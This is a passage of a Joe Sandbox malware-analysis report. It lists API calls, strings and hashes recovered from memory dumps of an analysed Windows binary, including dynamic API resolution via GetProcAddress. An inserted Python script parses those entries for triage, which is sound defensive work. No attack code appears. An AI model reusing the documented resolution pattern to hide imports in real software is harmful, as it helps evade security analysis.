                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpen
                                                                              • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                              • API String ID: 47109696-2631785700
                                                                              • Opcode ID: 7bfc696592b003d8a6b238063e783ff3189b4dca7eb8d211325608debd19b0e7
                                                                              • Instruction ID: d749d17306166952b18a3f7a40743e5d4d539800c31903ae925bcb827c574b5e
                                                                              • Opcode Fuzzy Hash: 7bfc696592b003d8a6b238063e783ff3189b4dca7eb8d211325608debd19b0e7
                                                                              • Instruction Fuzzy Hash: EEF0C231700150EBCB10EB9AD895B4E7398DB95356F50453BF980CB263C63CCC0ACA6E
                                                                              APIs
                                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004836C7,?,00000001,?,?,004836C7,?,00000001,00000000), ref: 0042DE38
                                                                              • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 004836E9
                                                                              • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 0048370C
                                                                              Strings
                                                                              • System\CurrentControlSet\Control\Windows, xrefs: 004836B6
                                                                              • CSDVersion, xrefs: 004836E0
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                              • API String ID: 3677997916-1910633163
                                                                              • Opcode ID: b08de6e064ab0066fdf25e92b32557c09a13beb56fb99f55e24ba5929372f4fd
                                                                              • Instruction ID: e2e1efa57e06e253ed5c33608a99233e6d60fcd3e82f395225068b7938859aaf
                                                                              • Opcode Fuzzy Hash: b08de6e064ab0066fdf25e92b32557c09a13beb56fb99f55e24ba5929372f4fd
                                                                              • Instruction Fuzzy Hash: 07F036F5A40209B6DF10EBD1CC45B9F77FC9B04B05F108567E910E7280E678DB048B59
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                              • API String ID: 1646373207-4063490227
                                                                              • Opcode ID: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                              • Instruction ID: 657275fb9dfacbe144619f02b172540cf2f0c5a6f4252bec6bd03a25d2dd35a2
                                                                              • Opcode Fuzzy Hash: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                              • Instruction Fuzzy Hash: A5E0DFE0B40B0122D70032BA1C82B6B108D4B84728F90053B3894E62D6DDBCD9840A6D
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAD0), ref: 0042EB62
                                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB68
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                              • API String ID: 1646373207-260599015
                                                                              • Opcode ID: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                              • Instruction ID: e1ec077e445c8734ae54db5ffdd633522f5c412f0b7fee52e54de0d29bb4c321
                                                                              • Opcode Fuzzy Hash: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                              • Instruction Fuzzy Hash: A2D0C793311732665D10B1F73CD1EAB058C891527935404B7F515E5641D55DEC1115AD
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498762), ref: 0044F77F
                                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: NotifyWinEvent$user32.dll
                                                                              • API String ID: 1646373207-597752486
                                                                              • Opcode ID: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                              • Instruction ID: 5e946f17392c81a4f172a46fe169fb9a1f72c9003761a5edf28bd31acc2f1150
                                                                              • Opcode Fuzzy Hash: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                              • Instruction Fuzzy Hash: 59E012F0E417049AFF00BBB57B86B1A3A90E764719B00057FF414A6292DB7C481C4F9D
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,004987B8,00000001,00000000,004987DC), ref: 004984E2
                                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 004984E8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                              • API String ID: 1646373207-834958232
                                                                              • Opcode ID: 0a6869f336692cffb72a3d37b5043cace6ddfe1b26e102b83d1b95de8ab3ca94
                                                                              • Instruction ID: 53974a48addda20669242eeec291eced9f9b3ea586a0102388b68221815f3be9
                                                                              • Opcode Fuzzy Hash: 0a6869f336692cffb72a3d37b5043cace6ddfe1b26e102b83d1b95de8ab3ca94
                                                                              • Instruction Fuzzy Hash: 8EB092C0280703689C8032BA0C02F1F08484C4272CB10003F3810A40C7ED6CDC00083D
                                                                              APIs
                                                                                • Part of subcall function 0044B658: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498762), ref: 0044B67F
                                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                              • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,0049878A), ref: 00464477
                                                                              • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 0046447D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoad
                                                                              • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                              • API String ID: 2238633743-2683653824
                                                                              • Opcode ID: 43e9449c42c64eafa185df201a3e78782dc27b2a49daecccd0491a4bbbb3dbf6
                                                                              • Instruction ID: aee408708d02c77079155b2370532760acd370d0883c3ae68736bebce920fed0
                                                                              • Opcode Fuzzy Hash: 43e9449c42c64eafa185df201a3e78782dc27b2a49daecccd0491a4bbbb3dbf6
                                                                              • Instruction Fuzzy Hash: 73B09290681740A8CA007BB2289BB0F2A4894B072E7A2463B7008710C6EF7C84204A6E
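The entries above are what the report's "Contains functionality to dynamically determine API calls" signature is built from: each one pairs a GetModuleHandleA or LoadLibraryA call with one or more GetProcAddress calls, and the recovered arguments carry the DLL name and the export name. Pulling those pairs out of the raw listing is a routine triage step, so the following is an added example (not part of the Joe Sandbox report, and not code from the analysed sample) that parses entries in exactly this layout. It assumes the report's own conventions as seen here: a bullet `•`, an optional `Part of subcall function XXXXXXXX:` prefix, `Api.MODULE(args)` and a trailing `ref: XXXXXXXX`. One caveat it handles deliberately: the recovered arguments are stack snapshots, so the DLL name may show up in the GetProcAddress line and the export name in the GetModuleHandleA line (as in the kernel32.dll entry above); the parser therefore pools module-like and identifier-like arguments per resolution group (one group per subcall address, plus the direct calls) instead of trusting argument positions. The sample text is constructed from lines copied off this page.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional

# Constructed sample in the shape of the report's "APIs" entries
# (lines copied from this report; three function entries).
SAMPLE = """\
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD), ref: 0042D90A
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
Strings
APIs
  • Part of subcall function 0044B658: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498762), ref: 0044B67F
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
• LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,0049878A), ref: 00464477
• GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 0046447D
Strings
APIs
  • Part of subcall function 0042EE30: GetTickCount.KERNEL32 ref: 0042EE36
  • Part of subcall function 0042EC88: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECBD
• GetLastError.KERNEL32(00000000,00475595,?,?,0049C1DC,00000000), ref: 0047547E
Memory Dump Source
"""

# One API line of the report: optional subcall prefix, Api.MODULE, optional (args), ref: address
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<lib>\w+)(?:\((?P<args>.*)\))?,?\s*ref: (?P<ref>[0-9A-F]{8})\s*$"
)
HEX_ARG = re.compile(r"[0-9A-F]{8}(?:\(\w+\))?")  # 00453B5A or 00000001(MOVEFILE_REPLACE_EXISTING)
IDENT = re.compile(r"[A-Za-z_]\w*")
RESOLVERS = {"GetModuleHandleA", "GetModuleHandleW", "LoadLibraryA", "LoadLibraryW",
             "LoadLibraryExA", "LoadLibraryExW", "GetProcAddress"}


@dataclass
class Call:
    api: str
    lib: str
    args: list
    ref: str
    subcall: Optional[str] = None  # callee address when reported as "Part of subcall function"


def arg_kind(arg):
    """Classify one recovered argument: module name, export name, constant, or unknown."""
    if arg == "?":
        return "unknown"
    if HEX_ARG.fullmatch(arg):
        return "const"
    if arg.lower().endswith(".dll"):
        return "module"
    if IDENT.fullmatch(arg):
        return "export"
    return "other"


def parse_entries(text):
    """Split report text into per-function entries; each entry starts at an 'APIs' heading."""
    entries = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            entries.append([])
            continue
        m = CALL_RE.match(line)
        if m and entries:
            args = m.group("args").split(",") if m.group("args") else []
            entries[-1].append(Call(m.group("api"), m.group("lib"), args, m.group("ref"), m.group("sub")))
    return entries


def resolved_imports(text):
    """Map each DLL to the export names resolved beside it via GetModuleHandle/LoadLibrary + GetProcAddress."""
    result = defaultdict(set)
    for entry in parse_entries(text):
        groups = defaultdict(list)  # one resolution group per subcall address (None = direct calls)
        for call in entry:
            if call.api in RESOLVERS:
                groups[call.subcall].append(call)
        for calls in groups.values():
            if not any(c.api == "GetProcAddress" for c in calls):
                continue
            modules, exports = set(), set()
            for c in calls:
                for a in (x.strip() for x in c.args):
                    kind = arg_kind(a)
                    if kind == "module":
                        modules.add(a.lower())
                    elif kind == "export":
                        exports.add(a)
            # Trust the pairing only when exactly one DLL name was recovered in the group
            key = modules.pop() if len(modules) == 1 else "?"
            result[key].update(exports)
    return {m: sorted(e) for m, e in sorted(result.items())}


if __name__ == "__main__":
    for module, exports in resolved_imports(SAMPLE).items():
        print(f"{module}: {', '.join(exports)}")
```

Run against a whole report, the output is a short DLL-to-export table that can be compared with the sample's static import table: names that appear here but not in the import directory are the ones worth reading in the disassembly first. A `?` key means the group recovered no DLL name or more than one, and those entries need a manual look rather than a guess.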
                                                                              APIs
                                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,0047D2E0,?,?,?,?,00000000,0047D435,?,?,?,00000000,?,0047D544), ref: 0047D2BC
                                                                              • FindClose.KERNEL32(000000FF,0047D2E7,0047D2E0,?,?,?,?,00000000,0047D435,?,?,?,00000000,?,0047D544,00000000), ref: 0047D2DA
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileNext
                                                                              • String ID:
                                                                              • API String ID: 2066263336-0
                                                                              • Opcode ID: 1bb33653f71372efa694325d8d6b641fbfb84b71fff8fb7ce2a7bf965ad77fdb
                                                                              • Instruction ID: 813c4c7e096b0537259228c6ce98783779beb739e450e2ccca0bb42f0b61749a
                                                                              • Opcode Fuzzy Hash: 1bb33653f71372efa694325d8d6b641fbfb84b71fff8fb7ce2a7bf965ad77fdb
                                                                              • Instruction Fuzzy Hash: 6A813B30D0024D9FDF11DFA5C845ADFBBB9EF49304F5080EAE808A3292D639AA46CF55
                                                                              APIs
                                                                                • Part of subcall function 0042EE30: GetTickCount.KERNEL32 ref: 0042EE36
                                                                                • Part of subcall function 0042EC88: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECBD
                                                                              • GetLastError.KERNEL32(00000000,00475595,?,?,0049C1DC,00000000), ref: 0047547E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CountErrorFileLastMoveTick
                                                                              • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                              • API String ID: 2406187244-2685451598
                                                                              • Opcode ID: c178663150e68b17ede051a88a8c0b8e52ebf449323b5d146d45458d51117132
                                                                              • Instruction ID: cb6e190203de8706f01eb9277cb95c8d8a5d25c2e0fbb05709c61410d89611bd
                                                                              • Opcode Fuzzy Hash: c178663150e68b17ede051a88a8c0b8e52ebf449323b5d146d45458d51117132
                                                                              • Instruction Fuzzy Hash: 9E41B770A006099BCB10EFA5D882AEE77B5EF48314F608537E404BB355D7789A418BAD
                                                                              APIs
                                                                              • GetDesktopWindow.USER32 ref: 00413D46
                                                                              • GetDesktopWindow.USER32 ref: 00413DFE
                                                                                • Part of subcall function 00418EC0: 6F58C6F0.COMCTL32(?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EDC
                                                                                • Part of subcall function 00418EC0: ShowCursor.USER32(00000001,?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EF9
                                                                              • SetCursor.USER32(00000000,?,?,?,?,00413AF3,00000000,00413B06), ref: 00413E3C
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CursorDesktopWindow$Show
                                                                              • String ID:
                                                                              • API String ID: 2074268717-0
                                                                              • Opcode ID: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                              • Instruction ID: d0219f8535474b9b7e790bb207accfb6dce16a9ac66decbe361331da1304c66b
                                                                              • Opcode Fuzzy Hash: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                              • Instruction Fuzzy Hash: 91412C75600210AFC710DF2AFA84B56B7E1EB65329B16817BE405CB365DB38DD81CF98
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A75
                                                                              • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AE4
                                                                              • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B7F
                                                                              • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BBE
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: LoadString$FileMessageModuleName
                                                                              • String ID:
                                                                              • API String ID: 704749118-0
                                                                              • Opcode ID: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                                              • Instruction ID: 7d65b0a5aa49ad722f3f3263bbe29e3330acee4661d9e2153cfe083702b22da2
                                                                              • Opcode Fuzzy Hash: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                                              • Instruction Fuzzy Hash: 1F3123716083849AD370EB65C945BDF77D89B85704F40483FB6C8E72D1EB7859048B6B
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E90D
                                                                                • Part of subcall function 0044CF50: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF82
                                                                              • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E991
                                                                                • Part of subcall function 0042BBB4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBC8
                                                                              • IsRectEmpty.USER32(?), ref: 0044E953
                                                                              • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E976
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                              • String ID:
                                                                              • API String ID: 855768636-0
                                                                              • Opcode ID: e9e3cf1fe88063870224b64a3ffaafaa7ea9294743723d0f52b5b35edb71e9c8
                                                                              • Instruction ID: f7bad605b8f68185b4e834990bb8ca2287257270a928060092b59a923d315d7c
                                                                              • Opcode Fuzzy Hash: e9e3cf1fe88063870224b64a3ffaafaa7ea9294743723d0f52b5b35edb71e9c8
                                                                              • Instruction Fuzzy Hash: E5114A71B0030067E650BA7B8C86B5B76C9AB88748F15083FB545EB387DE7DDD094299
                                                                              APIs
                                                                              • OffsetRect.USER32(?,?,00000000), ref: 004954F8
                                                                              • OffsetRect.USER32(?,00000000,?), ref: 00495513
                                                                              • OffsetRect.USER32(?,?,00000000), ref: 0049552D
                                                                              • OffsetRect.USER32(?,00000000,?), ref: 00495548
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: OffsetRect
                                                                              • String ID:
                                                                              • API String ID: 177026234-0
                                                                              • Opcode ID: 189e9286564265d853a06d191ff0450012ffb6c3854856ebd751307d5f0fca29
                                                                              • Instruction ID: 0cb6fc954a72117405a3be1f948335ff5a15e1e1cf1cb616ea1ff77106a83dd0
                                                                              • Opcode Fuzzy Hash: 189e9286564265d853a06d191ff0450012ffb6c3854856ebd751307d5f0fca29
                                                                              • Instruction Fuzzy Hash: 372181B6700601AFCB00DE69CD85E6B77DAEBC4344F248A2AF944C7249D638ED448755
                                                                              APIs
